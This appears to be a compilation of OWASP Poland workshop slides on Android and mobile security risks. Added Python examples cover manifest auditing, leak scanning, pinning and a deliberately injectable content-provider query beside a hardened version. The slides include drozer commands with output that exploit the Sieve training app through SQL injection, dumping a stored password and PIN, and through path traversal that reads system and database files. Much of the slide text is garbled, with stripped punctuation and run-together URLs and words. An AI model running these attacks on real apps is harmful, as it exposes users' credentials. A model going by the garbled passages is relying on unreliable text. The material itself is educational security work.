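      <intent-filter><action android:name="com.example.target.SETTINGS"/></intent-filter>
    </activity>
    <service android:name=".SyncService" android:permission="com.example.target.INTERNAL">
      <intent-filter><action android:name="com.example.target.SYNC"/></intent-filter>
    </service>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver">
      <intent-filter><action android:name="com.example.target.SOCIAL_SMS"/></intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.target.DBContentProvider"/>
  </application>
</manifest>
"""

COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


@dataclass(frozen=True)
class Exposure:
    kind: str                   # activity / service / receiver / provider
    name: str                   # android:name
    reason: str                 # why it counts as exported
    permission: Optional[str]   # android:permission, if any


def is_exported(elem: ET.Element, min_sdk: int) -> Tuple[bool, str]:
    """Apply the platform's default rules for android:exported."""
    explicit = elem.get(android_attr("exported"))
    if explicit is not None:
        return explicit == "true", 'android:exported="%s"' % explicit
    if elem.tag == "provider":
        # Providers default to exported when minSdkVersion/targetSdkVersion <= 16;
        # simplified here to minSdkVersion only.
        return min_sdk <= 16, "provider default for minSdk %d" % min_sdk
    if elem.find("intent-filter") is not None:
        return True, "implicitly exported by <intent-filter>"
    return False, "not exported"


def exposed_components(manifest_xml: str, min_sdk: int = 16) -> List[Exposure]:
    app = ET.fromstring(manifest_xml).find("application")
    found: List[Exposure] = []
    for elem in app:
        if elem.tag not in COMPONENT_TAGS:
            continue
        exported, reason = is_exported(elem, min_sdk)
        if exported:
            found.append(Exposure(elem.tag, elem.get(android_attr("name"), "?"),
                                  reason, elem.get(android_attr("permission"))))
    return found


def unprotected(manifest_xml: str, min_sdk: int = 16) -> List[Exposure]:
    """Exported components any installed app may reach: no android:permission."""
    return [e for e in exposed_components(manifest_xml, min_sdk) if e.permission is None]


def is_debuggable(manifest_xml: str) -> bool:
    app = ET.fromstring(manifest_xml).find("application")
    return app.get(android_attr("debuggable")) == "true"


if __name__ == "__main__":
    for e in unprotected(SAMPLE_MANIFEST):
        print("%-9s %-40s %s" % (e.kind, e.name, e.reason))
    print("debuggable:", is_debuggable(SAMPLE_MANIFEST))
```

Feed it the manifest Apktool decodes (the binary manifest inside the APK is not plain XML); the launcher activity will always appear, which is expected, and everything else on the list is a candidate for exported="false" or a signature-level custom permission.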
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain-text configuration files
– Cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (e.g. DevicePolicyManager.setStorageEncryption for device-admin apps)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure shared preferences are NOT MODE_WORLD_READABLE
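After the `adb pull /data/data/<package>` step from the "how to find" slide you have a directory tree to audit, and two of the mitigations above (no world-readable files, no plain-text secrets in shared preferences) are mechanical checks over it. The block below is an added example for this page, not code from the workshop or from any tool it names. The app directory it audits is constructed in a temp dir; the file modes it sets stand in for what MODE_WORLD_READABLE produces on the device (adb pull does not preserve them, so on a real assessment read the modes with `adb shell ls -l` and use this scanner for the content checks), and SECRET_KEY_RE is my own list of suspicious preference names.

```python
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Preference keys whose presence in plain text is worth a finding (my list).
SECRET_KEY_RE = re.compile(r"(pass(word)?|pwd|secret|token|api[_-]?key|session|pin)", re.I)


def build_sample_app_dir() -> str:
    """Constructed /data/data/<pkg> lookalike (not a real app's data): a
    world-readable shared_prefs file holding a password and a token, and a
    database with the correct, private permissions."""
    base = tempfile.mkdtemp(prefix="app_")
    prefs = os.path.join(base, "shared_prefs")
    os.makedirs(prefs)
    creds = os.path.join(prefs, "creds.xml")
    with open(creds, "w") as fh:
        fh.write('<?xml version="1.0" encoding="utf-8"?>\n<map>\n'
                 '  <string name="username">alice</string>\n'
                 '  <string name="password">hunter2</string>\n'
                 '  <string name="auth_token">eyJhbGciOiJIUzI1NiJ9.e30.sig</string>\n'
                 '</map>\n')
    os.chmod(creds, 0o664)                       # what MODE_WORLD_READABLE yields
    dbs = os.path.join(base, "databases")
    os.makedirs(dbs)
    db = os.path.join(dbs, "app.db")
    with open(db, "wb") as fh:
        fh.write(b"SQLite format 3\x00")
    os.chmod(db, 0o660)                          # MODE_PRIVATE
    return base


def world_readable(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def secrets_in_shared_prefs(xml_path: str) -> List[str]:
    """Names of preference entries that look like credentials."""
    root = ET.parse(xml_path).getroot()
    return [node.get("name", "") for node in root if SECRET_KEY_RE.search(node.get("name", ""))]


def audit_app_dir(app_dir: str) -> List[Tuple[str, str]]:
    """(finding, relative path) for every file that violates the mitigations."""
    findings: List[Tuple[str, str]] = []
    for dirpath, _, files in os.walk(app_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, app_dir)
            if world_readable(path):
                findings.append(("world-readable", rel))
            if os.path.basename(dirpath) == "shared_prefs" and name.endswith(".xml"):
                for key in secrets_in_shared_prefs(path):
                    findings.append(("plaintext-secret:" + key, rel))
    return sorted(findings)


if __name__ == "__main__":
    for finding, rel in audit_app_dir(build_sample_app_dir()):
        print("%-28s %s" % (finding, rel))
```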
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak ciphers / protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser's side
• It is done through a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    start_connection();
else
    drop_connection();
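The comparison in the pseudo-code above is usually done on a hash of the certificate rather than on the certificate itself, and it runs in addition to, not instead of, normal chain and hostname validation. The block below is an added example for this page, not code from the workshop or from the hello-pinnedcerts project in the references: it pins the SHA-256 of the DER-encoded leaf certificate in the "sha256/<base64>" form OkHttp and HPKP use, compares in constant time against a set that can hold a backup pin for rotation, and shows where the check sits relative to Python's ssl module. The DER bytes and both pin values are constructed so the comparison logic can run offline; open_pinned() does real network I/O and is not exercised by the test.

```python
import base64
import hashlib
import hmac
import socket
import ssl
from typing import Iterable


def cert_fingerprint(der_cert: bytes) -> str:
    """sha256 over the DER certificate, rendered as 'sha256/<base64>'."""
    digest = hashlib.sha256(der_cert).digest()
    return "sha256/" + base64.b64encode(digest).decode("ascii")


def pin_matches(der_cert: bytes, pins: Iterable[str]) -> bool:
    """The slide's `presented_cert == pinned_cert`, done on hashes and in
    constant time. Several pins let you ship a backup certificate's pin so
    a rotation does not brick the app."""
    presented = cert_fingerprint(der_cert)
    return any(hmac.compare_digest(presented, pin) for pin in pins)


def open_pinned(host: str, port: int, pins: Iterable[str], timeout: float = 10.0) -> ssl.SSLSocket:
    """Chain and hostname validation first (create_default_context does both),
    then the pin check on the leaf; fail closed on mismatch."""
    ctx = ssl.create_default_context()
    raw = socket.create_connection((host, port), timeout=timeout)
    tls = ctx.wrap_socket(raw, server_hostname=host)
    der = tls.getpeercert(binary_form=True)
    if der is None or not pin_matches(der, pins):
        tls.close()                                 # drop_connection()
        raise ssl.SSLError("certificate pin mismatch for %s" % host)
    return tls                                      # start_connection()


# Constructed stand-in for a DER-encoded leaf certificate (NOT a real
# certificate): enough bytes to exercise the hashing and comparison.
SAMPLE_LEAF_DER = b"\x30\x82\x01\x00" + b"constructed-leaf-certificate".ljust(256, b"\x00")

# Primary pin derived from the sample above plus a constructed backup pin.
PINNED = {
    cert_fingerprint(SAMPLE_LEAF_DER),
    "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
}


if __name__ == "__main__":
    print(cert_fingerprint(SAMPLE_LEAF_DER))
    print("match:", pin_matches(SAMPLE_LEAF_DER, PINNED))
    print("tampered:", pin_matches(SAMPLE_LEAF_DER + b"\x00", PINNED))
```

Pinning the whole leaf certificate means every renewal needs an app update; pinning the SubjectPublicKeyInfo instead survives renewals that keep the key, but extracting the SPKI needs an ASN.1 parser that is not in the standard library, so it is left out here.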
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use MalloDroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run scanner.provider.finduris -a <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
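`adb logcat` on a busy device produces far more than you can read, so the logging check above is best done with a filter that knows what a leaked credential looks like. The block below is an added example for this page, not a tool from the workshop: a parser for logcat's default "brief" line format plus a handful of leak patterns (password key/value pairs, bearer tokens, JWTs, e-mail addresses, GPS fixes) run over constructed log lines. The lines, tags and PIDs are invented for the demonstration, and the pattern set is my own starting point, not a complete list.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed logcat output in the default "brief" format (not captured from a real device).
SAMPLE_LOGCAT = """\
I/ActivityManager(  812): Start proc com.example.bank for activity com.example.bank/.LoginActivity
D/LoginActivity( 4321): login request user=alice password=hunter2
D/OkHttp( 4321): Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.abc123DEF456ghi789
I/Analytics( 4321): event=signup email=alice@example.org
D/LocationHelper( 4321): last fix 51.1079,17.0385 sent to analytics
W/System.err( 4321): java.io.IOException: timeout
"""

# priority/tag(  pid): message
BRIEF_RE = re.compile(r"^([VDIWEF])/(.+?)\(\s*(\d+)\):\s?(.*)$")

LEAK_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "password-kv": re.compile(r"(?i)\b(?:pass(?:word)?|pwd)\s*[=:]\s*\S+"),
    "bearer": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9._~+/-]{16,}=*"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "gps": re.compile(r"-?\d{1,2}\.\d{4,},\s*-?\d{1,3}\.\d{4,}"),
}


def parse_brief(line: str) -> Optional[Tuple[str, str, int, str]]:
    """(priority, tag, pid, message) for a brief-format line, else None."""
    m = BRIEF_RE.match(line)
    if not m:
        return None
    prio, tag, pid, msg = m.groups()
    return prio, tag.strip(), int(pid), msg


def find_leaks(logcat_text: str, only_pid: Optional[int] = None) -> List[Tuple[str, str, str]]:
    """(tag, leak kind, matched text) for every suspicious message; pass the
    target app's PID to ignore the rest of the device."""
    hits: List[Tuple[str, str, str]] = []
    for line in logcat_text.splitlines():
        parsed = parse_brief(line)
        if parsed is None:
            continue
        _prio, tag, pid, msg = parsed
        if only_pid is not None and pid != only_pid:
            continue
        for kind, rx in LEAK_PATTERNS.items():
            m = rx.search(msg)
            if m:
                hits.append((tag, kind, m.group(0)))
    return hits


if __name__ == "__main__":
    for tag, kind, text in find_leaks(SAMPLE_LOGCAT, only_pid=4321):
        print("%-15s %-12s %s" % (tag, kind, text))
```

Pipe a live capture through it with `adb logcat -v brief | python3 leakscan.py` after adapting the main block to read stdin; the PID filter matters because other apps' noise otherwise drowns the target, and the crash-log caveat from the mitigations slide applies just as much to what this finds in W/ and E/ lines.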
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or escalate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromising the operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed; they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.

Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused.
• By launching it via intents it's possible to achieve the following:
  – modify data in the background
  – trick the user
  – leak sensitive information
• General hijacking scheme (figure: apps A, B and E)
• Results of an attack:
  – a malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – spoofing the expected Activity's user interface to steal user-supplied data (phishing)
• List and launch exported activities:

    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList

    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file.

Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction: it must be exported, or respond to/accept input from message formats like intents, files or the network stack.
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat running to check for sensitive info
• Fire off intents and wait for the result
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device.
• What info can they hold?
  – user's phone numbers
  – passwords
  – SMS
• And one of the main problems is, again, permissions:

    dz> run app.provider.info --permission null

Content providers attacks
• Unrestricted access to the app database
  – just query it: dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command.

    dz> run scanner.provider.injection -a com.mwr.example.sieve

Unrestricted access to the app database:

    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys/
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/

    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

SQL injection:

    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
    | Password         | pin  |
    | thisismypassword | 9876 |
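The projection and selection injections above work because Sieve concatenates caller-supplied strings into its SQL. As an added example (not code from the slides, from Sieve or from drozer), the following Python reproduces that pattern against a constructed in-memory copy of the Passwords and Key tables, and puts a hardened query() beside it that allowlists projection columns and binds selection arguments; the table layout and row values are assumptions for the demo.

```python
"""Why Sieve's selection/projection strings are injectable, and one fix.

Added example; not code from the slides, Sieve or drozer. A ContentProvider
query() receives projection, selection and selectionArgs from the caller, and
Sieve pastes projection and selection straight into its SQL. This reproduces
that pattern with Python's sqlite3 on a constructed in-memory copy of the two
tables, then shows a hardened query() that allowlists columns and binds values.
"""
import re
import sqlite3

PASSWORD_COLUMNS = ("_id", "service", "username", "password")


def build_db():
    """Constructed stand-in for Sieve's database.db (tables Passwords and Key)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, "
                 "username TEXT, password BLOB)")
    conn.execute("CREATE TABLE Key(Password TEXT, pin TEXT)")
    conn.execute("INSERT INTO Passwords(service, username, password) "
                 "VALUES ('mail', 'alice', X'0102')")
    conn.execute("INSERT INTO Key VALUES ('thisismypassword', '9876')")
    return conn


def vulnerable_query(conn, projection, selection, selection_args=()):
    """The flawed pattern: caller-controlled strings concatenated into SQL."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % cols
    if selection:
        sql += " WHERE (%s)" % selection   # a lone "'" here gives the slide's syntax error
    return conn.execute(sql, selection_args).fetchall()


# The only selection shape the hardened version accepts: "<known column> = ?"
_SELECTION_SHAPE = re.compile(r"^\s*(%s)\s*=\s*\?\s*$" % "|".join(PASSWORD_COLUMNS))


def hardened_query(conn, projection, selection, selection_args=()):
    """Allowlist projection columns; accept only '<column> = ?' and bind the value."""
    cols = tuple(projection) if projection else PASSWORD_COLUMNS
    for col in cols:
        if col not in PASSWORD_COLUMNS:
            raise ValueError("unknown column %r" % col)
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    params = ()
    if selection:
        match = _SELECTION_SHAPE.match(selection)
        if match is None:
            raise ValueError("selection not allowed: %r" % selection)
        sql += " WHERE %s = ?" % match.group(1)
        params = tuple(selection_args)   # values travel as bind parameters, never as SQL text
    return conn.execute(sql, params).fetchall()


def demo():
    """Replay the slide's projection trick against both implementations."""
    conn = build_db()
    leaked = vulnerable_query(conn, ["* FROM Key--"], None)   # reads the Key table instead
    try:
        hardened_query(conn, ["* FROM Key--"], None)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The hardened version deliberately refuses free-form selections rather than trying to escape them; if the provider genuinely needs richer filters, SQLiteQueryBuilder with setProjectionMap() and setStrict() gives the same allowlisting on Android.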
Path traversal:
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/

    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost

    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes.
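What the FileBackupProvider should have done before opening the requested file, as an added example in Python (not code from Sieve, the slides or drozer): resolve the path against the provider's backup directory and refuse anything that escapes it. The directory layout and file contents are constructed for the demo.

```python
"""Hardened file lookup for a provider like Sieve's FileBackupProvider.

Added example, not code from Sieve, the slides or drozer. Sieve's openFile()
hands the URI path straight to the filesystem, which is why /etc/hosts and the
app's own database.db are readable through it. This resolves the requested
path against the provider's backup directory and refuses anything outside it.
"""
import os
import tempfile


def safe_resolve(base_dir, requested):
    """Return the canonical path for `requested` inside base_dir, or None if it escapes."""
    base = os.path.realpath(base_dir)
    # Drop a leading slash so an "absolute" request cannot replace the base directory.
    target = os.path.realpath(os.path.join(base, requested.lstrip("/")))
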